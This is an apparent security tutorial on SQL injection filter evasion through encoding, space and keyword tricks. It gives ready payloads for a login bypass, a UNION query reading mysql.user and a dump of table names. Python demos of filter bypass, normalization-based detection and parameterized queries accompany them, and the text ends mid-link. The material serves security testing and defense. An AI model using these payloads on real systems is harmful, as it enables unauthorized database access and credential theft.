Understanding SQL Injection Filter Evasion Techniques
Web applications deploy input filters to block common SQL injection attacks, but sophisticated bypass techniques can circumvent these defenses. As a penetration tester, understanding these evasion methods is essential for identifying vulnerabilities in hardened systems and helping organizations strengthen their security posture.
Key Points
- Character encoding transforms malicious payloads into alternative representations that bypass detection
- Quote-free injection techniques exploit numerical contexts and SQL functions when quotes are filtered
- Space replacement methods use comments, special characters, and parentheses to maintain query syntax
- Keyword obfuscation employs case variation, encoding, and symbolic operators to evade blacklist filters
- Defense requires parameterized queries, positive validation, and WAF deployment with custom rules
Character Encoding Techniques
Filters frequently fail to detect encoded payloads, allowing attackers to transform malicious input into alternative representations that slip through validation checks.
URL Encoding
Replace special characters with percent-encoded equivalents:
- ' becomes %27
- (space) becomes %20
- = becomes %3D
Example: ' OR 1=1-- transforms to %27%20OR%201%3D1--
The web server normally decodes percent-encoding before the application sees the value, so this only evades a filter that inspects the raw request (a WAF rule or a front-end check that does not decode first); a filter applied after decoding sees the original characters.
Hexadecimal Encoding
Represent strings as hex values directly in SQL queries:
-- Instead of: SELECT * FROM users WHERE name = 'admin'
SELECT * FROM users WHERE name = 0x61646d696e
The hex value 0x61646d696e decodes to admin without using quotes. This is MySQL syntax: a hex literal compared against a string column is treated as a binary string, whereas in a numeric context the same literal is an integer.
Unicode Encoding
Where the application decodes JSON- or JavaScript-style escapes before building the query, represent characters as Unicode escape sequences; the database itself does not interpret them, so the decoding step has to exist in the application:
admin → \u0061\u0064\u006d\u0069\u006e
Pro Tip: Layer multiple encoding methods (for example URL encoding on top of Unicode escapes, or percent-encoding the % signs themselves as %25) to get past a filter that decodes only once. This only pays off when a later component decodes the value again before it reaches the query.
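Added example (not the article's code): a Python simulation of the decode-order problem that decides whether URL encoding and double encoding get past a filter. The naive blacklist, the two-stage request model and the decode counts are constructed for illustration.

```python
import re
import urllib.parse

# Deliberately naive blacklist of the kind described above: it rejects a
# literal single quote or a bare "OR 1=1" clause. (Constructed for this example.)
BLACKLIST = re.compile(r"'|\bor\s+1\s*=\s*1\b", re.IGNORECASE)


def naive_filter_blocks(text: str) -> bool:
    """True if the blacklist rejects the text exactly as it is handed in."""
    return BLACKLIST.search(text) is not None


def waf_then_app(payload: str, waf_decodes: int, app_decodes: int):
    """Model a request path with two percent-decoding stages.

    waf_decodes: how many times the filtering layer decodes the parameter
                 before inspecting it (0 = it inspects the raw request).
    app_decodes: how many times the value is decoded in total on its way to
                 the query builder (1 is the normal web-server decode; 2 means
                 some later component decodes again).
    Returns (blocked, value_seen_by_query_builder).
    """
    inspected = payload
    for _ in range(waf_decodes):
        inspected = urllib.parse.unquote(inspected)
    if naive_filter_blocks(inspected):
        return True, None
    reached = payload
    for _ in range(app_decodes):
        reached = urllib.parse.unquote(reached)
    return False, reached


PAYLOAD = "' OR 1=1--"
ENCODED_ONCE = urllib.parse.quote(PAYLOAD, safe="")        # %27%20OR%201%3D1--
ENCODED_TWICE = urllib.parse.quote(ENCODED_ONCE, safe="")  # %2527%2520OR%25201%253D1--


def scenarios():
    """Run the situations discussed in the text and return each outcome."""
    return {
        # Filter inspects the raw request, web server decodes once: bypassed.
        "raw_filter_single_encoding": waf_then_app(ENCODED_ONCE, 0, 1),
        # Filter decodes before inspecting: single encoding is caught.
        "decoding_filter_single_encoding": waf_then_app(ENCODED_ONCE, 1, 1),
        # Double encoding slips past a filter that decodes once, but the query
        # builder then only receives the harmless single-encoded text...
        "double_encoding_app_decodes_once": waf_then_app(ENCODED_TWICE, 1, 1),
        # ...unless something downstream decodes a second time.
        "double_encoding_app_decodes_twice": waf_then_app(ENCODED_TWICE, 1, 2),
    }


if __name__ == "__main__":
    for name, outcome in scenarios().items():
        print(f"{name}: {outcome}")
```

The last two scenarios are the point of the pro tip: double encoding is only a bypass when the stack really does decode twice; otherwise the query builder receives literal percent signs and the attack fails silently.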
No-Quote SQL Injection
When single or double quotes are blocked by filters, alternative techniques can maintain injection effectiveness.
Numerical Context Exploitation
Exploit queries that expect a numeric value, where the parameter is interpolated without quotes and none are syntactically required:
-- Original (string context): ' OR '1'='1
-- No-quote version (numeric context, e.g. WHERE id = 1): 1 OR 1=1
SQL Comment Truncation
Use comment syntax (-- or #) to discard the remainder of the query. In MySQL, -- must be followed by a space or control character, whereas # needs no trailing space:
-- String context (the quote is needed to close the literal): admin'-- (note the trailing space)
-- Numeric context (no quote required): 1-- (note the trailing space)
If a filter merely strips quotes, admin'-- becomes admin--, which stays inside the string literal and terminates nothing; quote-free comment truncation only works where the value is interpolated unquoted.
String Concatenation Functions
Build strings dynamically using SQL functions:
| Function | Example | Result |
|---|---|---|
| CONCAT() (MySQL) | CONCAT(0x61, 0x64, 0x6d, 0x69, 0x6e) | admin |
| CHAR() (MySQL, takes a list of code points) | CHAR(97,100,109,105,110) | admin |
| Concatenation operator (MSSQL +; Oracle and PostgreSQL \|\| with CHR()) | CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110) | admin |
In MySQL, + is arithmetic, so 0x61+0x64 evaluates to 197 rather than a string; use CONCAT() or CHAR() there.
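As an added example (not part of the original article), the following Python helpers generate the quote-free string representations from the table above for each dialect, and a pair of hypothetical vulnerable query builders show why a numeric context needs no quote while a quote-stripping filter leaves admin'-- harmlessly inside a string literal. The builders, the strip_quotes filter and the users table are assumptions for illustration.

```python
def hex_literal(text: str) -> str:
    """MySQL hex literal. In a string context 0x61646d696e compares equal
    to 'admin'; in a numeric context MySQL treats it as an integer instead."""
    return "0x" + text.encode().hex()


def mysql_char(text: str) -> str:
    """MySQL CHAR() accepts a list of code points."""
    return "CHAR(" + ",".join(str(b) for b in text.encode()) + ")"


def mysql_concat_hex(text: str) -> str:
    """CONCAT() of one-byte hex literals; each one is a binary string in MySQL."""
    return "CONCAT(" + ",".join(f"0x{b:02x}" for b in text.encode()) + ")"


def mssql_char_plus(text: str) -> str:
    """MSSQL: CHAR() takes a single code point and + concatenates strings."""
    return "+".join(f"CHAR({b})" for b in text.encode())


def oracle_pg_chr(text: str) -> str:
    """Oracle / PostgreSQL: CHR() takes a single code point and || concatenates."""
    return "||".join(f"CHR({b})" for b in text.encode())


def strip_quotes(value: str) -> str:
    """Hypothetical filter that strips single and double quotes."""
    return value.replace("'", "").replace('"', "")


def build_id_lookup(user_id: str) -> str:
    """Hypothetical vulnerable builder: numeric context, value interpolated unquoted."""
    return f"SELECT * FROM users WHERE id = {strip_quotes(user_id)}"


def build_name_lookup(name: str) -> str:
    """Hypothetical vulnerable builder: string context, value wrapped in quotes."""
    return f"SELECT * FROM users WHERE name = '{strip_quotes(name)}'"


if __name__ == "__main__":
    # Numeric context: the filter removes nothing useful, the OR clause survives.
    print(build_id_lookup("1 OR 1=1"))
    # Numeric context plus a hex literal: a string comparison without any quote.
    print(build_id_lookup("0 OR name=" + hex_literal("admin")))
    # String context: the stripped quote leaves admin-- inside the literal.
    print(build_name_lookup("admin'--"))
    for fn in (mysql_char, mysql_concat_hex, mssql_char_plus, oracle_pg_chr):
        print(fn.__name__, fn("admin"))
```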
Space Bypass Methods
Space filtering is common but easily circumvented using alternative whitespace characters and SQL syntax tricks.
Inline Comments
Replace spaces with /**/ comment blocks:
SELECT/**/*/**/FROM/**/users
Alternative Whitespace Characters
Use URL-encoded alternatives that the database lexer also treats as whitespace. The exact set is database-specific; the list below is what MySQL accepts:
- %09 (horizontal tab)
- %0A (line feed)
- %0B (vertical tab) and %0C (form feed)
- %0D (carriage return)
- %A0 (non-breaking space; MySQL treats this byte as whitespace, most other databases do not)
Example: SELECT%0A*%0AFROM%0Ausers
Parentheses Grouping
Group expressions without requiring spaces:
SELECT(1)FROM(users)WHERE(id=1)
Keyword Obfuscation Strategies
SQL keyword blacklists can be bypassed through various obfuscation techniques.
| Filter Target | Bypass Technique | Example |
|---|---|---|
| SELECT | Case variation (defeats case-sensitive matching only) | SElEcT, sELeCt |
| SELECT | MySQL version comment; a plain /**/ inside a keyword splits it into two tokens, so SE/**/LECT does not parse as SELECT | /*!SELECT*/, /*!50000SELECT*/ |
| UNION | Hex-encoded string; this is still a string literal, so it only helps where the value is later executed as SQL (e.g. MSSQL EXEC()) | 0x554E494F4E |
| AND / OR | Symbolic operators (MySQL; in most other databases \|\| is string concatenation) | && (AND), \|\| (OR) |
| = | Alternative comparisons | LIKE, REGEXP, IN() |
| Any keyword | String concatenation (same limitation as the hex-encoded string) | CONCAT('SE','LECT') |
Critical Note: Modern WAFs employ pattern recognition beyond simple keyword matching. Always test payloads incrementally and monitor responses.
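Added example (not from the original article): a small normalizer of the kind a custom WAF rule can apply before keyword matching, run against constructed payloads that use the space and keyword tricks from the two sections above. The naive rules and sample payloads are made up for this illustration; the whitespace set models MySQL's lexer, and the %A0 byte is represented as the decoded character \xa0.

```python
import re

# Bytes MySQL's lexer accepts as whitespace besides the regular space:
# tab, LF, VT, FF, CR and 0xA0 (assumption: modelled on MySQL behaviour).
ALT_WS = r"[\t\n\x0b\x0c\r \xa0]+"

# Naive signatures of the kind a keyword blacklist uses: they only match
# when the keywords are separated by literal spaces. (Constructed for the example.)
NAIVE_RULES = [re.compile(p, re.IGNORECASE)
               for p in (r"union +select", r"select +.+ +from")]


def naive_blacklist(text: str) -> bool:
    """Match the raw text against the space-dependent rules."""
    return any(rule.search(text) for rule in NAIVE_RULES)


def normalize(text: str) -> str:
    """Undo the common obfuscations before matching.

    1. Unwrap MySQL version comments so /*!50000SELECT*/ exposes SELECT.
    2. Drop ordinary block comments; the lexer treats them as token separators.
    3. Pad parentheses so SELECT(1)FROM(users) becomes separate tokens.
    4. Collapse every accepted whitespace byte to a single space, then lowercase.
    """
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.DOTALL)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    text = re.sub(r"([()])", r" \1 ", text)
    text = re.sub(ALT_WS, " ", text)
    return text.strip().lower()


def normalized_blacklist(text: str) -> bool:
    """The same rules, applied after normalization."""
    return naive_blacklist(normalize(text))


# Constructed payloads, one per evasion technique discussed above.
SAMPLES = {
    "plain": "1 UNION SELECT 1,2,3",
    "mixed_case": "1 uNiOn sElEcT 1,2,3",
    "inline_comments": "1/**/UNION/**/SELECT/**/1,2,3",
    "tab": "1\tUNION\tSELECT\t1,2,3",
    "nbsp": "1\xa0UNION\xa0SELECT\xa01,2,3",
    "parentheses": "SELECT(1)FROM(users)WHERE(id=1)",
    "version_comment": "1 /*!50000UNION*/ /*!50000SELECT*/ 1,2,3",
}


def evaluate():
    """Return {name: (caught_by_naive_rules, caught_after_normalization)}."""
    return {name: (naive_blacklist(p), normalized_blacklist(p))
            for name, p in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in evaluate().items():
        print(f"{name:16} naive={naive!s:5} normalized={normalized}")
```

Note that mixed case alone never got past the rules, because they are case-insensitive; it is the space and comment tricks that the naive rules miss. Normalization of this kind is a detection aid with its own false negatives (a parser-level WAF or, better, parameterized queries are the real fix), which is what the critical note above is getting at.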
Practical Attack Examples
Example 1: Bypassing Space and Keyword Filters
Scenario: Filter blocks spaces and the SELECT keyword
Payload:
SElEcT/**/*/**/FrOm/**/(SeLeCt/**/group_concat(table_name)/**/FrOm/**/information_schema.tables)a
Techniques used:
- Case variation on SELECT and FROM (defeats case-sensitive matching only)
- Inline comments (/**/) replacing spaces
- Subquery aliasing with a (MySQL requires every derived table to carry an alias)
The outer query selects * so that the concatenated table names from the subquery are actually returned.
Example 2: Quote-Filtered Login Bypass
Scenario: Login form filters single and double quotes
Original attack:
username=admin&password=1'||'1'='1
Encoded bypass (only effective when the quote filter inspects the raw, undecoded parameter; the web server decodes %27 back to ' before the application sees it):
username=admin&password=1%27%7C%7C%271%27%3D%271
Alternative approach (numeric context; assumes the password value is interpolated unquoted and that the database treats || as OR, as MySQL does by default):
username=admin&password=1||1
Example 3: Multi-Layer Evasion
Scenario: WAF blocks common SQL keywords and special characters
Payload:
1%09uNiOn%09sElEcT%091,CONCAT(0x75,0x73,0x65,0x72),3%09fRoM%09mysql.user
Techniques combined:
- Tab character (%09) in place of spaces
- Hex encoding for the string user (CONCAT(0x75,0x73,0x65,0x72)), so no quotes are needed
- Mixed-case keywords (uNiOn, sElEcT, fRoM), which defeat case-sensitive matching only
The three selected columns assume the original query returns three columns; adjust the count to match the target.
Defensive Countermeasures
While this guide focuses on offensive techniques, understanding defense is crucial for comprehensive security testing.
Primary Defenses
- Parameterized queries (prepared statements) separate SQL logic from data input
- Positive input validation uses allowlists to permit only expected characters
- Stored procedures with proper parameter handling reduce injection surface area, provided they do not build dynamic SQL from their arguments internally
- Least privilege database accounts limit damage from successful attacks
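Added example, not from the original article: the vulnerable string-built query beside its parameterized and allowlist-validated forms, using Python's standard sqlite3 module with a constructed in-memory users table. The table, the rows and the function names are made up for illustration; the -- comment behaves the same in SQLite as in the MySQL examples above.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two users, plaintext passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def vulnerable_login(conn, username: str, password: str):
    """String context, values interpolated into the SQL text: injectable."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def safe_login(conn, username: str, password: str):
    """Parameterized query: the driver sends the values separately from the
    SQL text, so quotes and comment markers inside them are just data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def vulnerable_by_id(conn, user_id: str):
    """Numeric context, value interpolated unquoted: injectable without any quote."""
    return [row[0] for row in conn.execute(f"SELECT username FROM users WHERE id = {user_id}")]


def safe_by_id(conn, user_id: str):
    """Positive validation plus a parameter: int() rejects anything that is
    not a plain integer (raising ValueError), and the value is still bound
    rather than interpolated."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE id = ?", (int(user_id),))]


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "admin'--", "wrong"))      # comment truncation
    print(vulnerable_login(db, "x", "' OR 1=1--"))        # tautology, all rows
    print(safe_login(db, "admin'--", "wrong"))            # nothing
    print(vulnerable_by_id(db, "1 OR 1=1"))               # quote-free injection
    print(safe_by_id(db, "1"))                            # only the bound id
```

Least-privilege database accounts are the remaining layer: even if one of the vulnerable builders survives review, an account that can only read the users table cannot be used to reach mysql.user or information_schema the way the attack examples above do.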
Detection and Monitoring
- Web Application Firewalls (WAFs) with custom rules for encoding detection
- Anomaly detection systems that identify unusual query patterns
- Regular log audits for suspicious character sequences and encoding attempts
- Rate limiting to slow down automated injection attempts
Testing Recommendations
- Test all encoding combinations during security assessments
- Verify that filters apply to all input vectors (headers, cookies, parameters)
- Check for filter inconsistencies between application layers
- Document bypass techniques discovered for remediation prioritization
Learn More
Official Documentation
- OWASP SQL Injection Prevention Cheat Sheet - Comprehensive prevention strategies
- MySQL String Functions - Reference for concatenation and encoding functions
- OWASP Testing Guide: SQL Injection - Structured testing methodology
Books and In-Depth Resources
- SQL Injection Attacks and Defense (Second Edition) by Justin Clarke - Comprehensive coverage of attack vectors and defenses
- The Web Application Hacker's Handbook by Dafydd Stuttard and Marcus Pinto - Broader context of web application security testing
Hands-On Practice
- PortSwigger SQL Injection Labs - Free interactive labs with progressive difficulty
- [SQLmap](https://sqlmap.